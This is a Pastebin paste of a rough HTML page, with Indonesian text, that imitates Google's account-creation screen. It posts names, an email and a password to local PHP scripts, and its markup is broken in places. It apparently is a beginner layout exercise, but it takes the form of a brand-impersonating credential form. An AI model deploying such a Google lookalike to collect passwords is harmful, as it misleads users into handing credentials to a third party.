Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html>
- <head>
- <title>Gmail</title>
- <meta charset="utf-8" />
- <meta http-equiv="X-UA-Compatible" content="IE=edge">
- <title>Page Title</title>
- <meta name="viewport" content="width=device-width, initial-scale=1">
- <link rel="stylesheet" type="text/css" media="screen" href="main.css" />
- <script src="main.js"></script>
- <style>
- body{
- background-image:url("kopi cuy.mp4");
- back
- }
- fieldset{
- position: absolute;
- margin-top: 100px;
- margin-left: 100px;
- left:23%;
- top: 18%;
- width: 700px;
- height: 450px;
- border-radius: 30px;
- margin: 0ch
- }
- .e{
- width: 367px;
- height: 30px;
- }
- .d{
- margin-right: 6%;
- width: 160px;
- height: 30px;
- }
- .g{
- height: 30px;
- }
- .b{
- margin-left: 38%;
- background-color: royalblue;
- color: white;
- width: 100px;
- height: 30px;
- border-radius: 5px;
- }
- .p{
- margin-right: 6%;
- height: 30px;
- }
- .k{
- height: 30px;
- }
- .buat{
- text-align: left;
- font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
- }
- .gmb{
- left: 0;
- }
- .text{
- font-family: Arial, Helvetica, sans-serif;
- font-size: 13px;
- }
- .akun{
- margin-top: -45%;
- margin-right: 12%;
- }
- figcaption{
- margin-left: 55%;
- margin-top: -15%;
- font-family: Arial, Helvetica, sans-serif;
- }
- .untuk{
- margin-left: 25%;
- margin-top: 12%;
- font-family: Arial, Helvetica, sans-serif;
- }
- .c{
- color: white;
- }
- </style>
- </head>
- <body>
- <section>
- <fieldset>
- <img class="buat" src="google.png" width="100" height="40">
- <br>
- <br>
- <div>
- <h1 class="buat">Buat Akun Google</h1>
- <h3 class="buat">Lanjutkan ke Gmail</h3>
- </div>
- <div>
- <form method="post" action="jadi.php" id="form">
- <input class="d" type="text" name="namad" id="namad" placeholder="nama depan"/>
- <input class="g" type="text" name="namab" id="namab" placeholder="nama belakang"/>
- </div>
- <br>
- <div>
- <form method="post" action="hasil.php" id="form">
- <input class="e" type="text" name="email" id="email" placeholder="email"/>
- </div>
- <div>
- <text class="text">Anda dapat menggunakan huruf,angka&simbol</text>
- </div>
- <br>
- <div>
- <form method="post" action="hasil.php" id="form">
- <input class="p" type="password" name="pw" id="pw" placeholder="password"/>
- <input class="k" type="password" placeholder=" Konfirmasi"><br>
- <text class="text">Gunakan minimal 8 karakter dengan campuran huruf,angka</text>
- <br>
- <text class="text">&simbol </text>
- <br><br>
- <input class="b"type="submit" name="submit" id="submit" value="Submit">
- </div>
- <div>
- <img class="akun" src="account.svg" width="220" align="right">
- </div>
- <div>
- <figcaption> Satu akun. Seluruh Google bekerja</figcaption>
- </div>
- <div class="untuk">
- <figcaption>untuk anda</figcaption>
- </div>
- </fieldset>
- </section>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment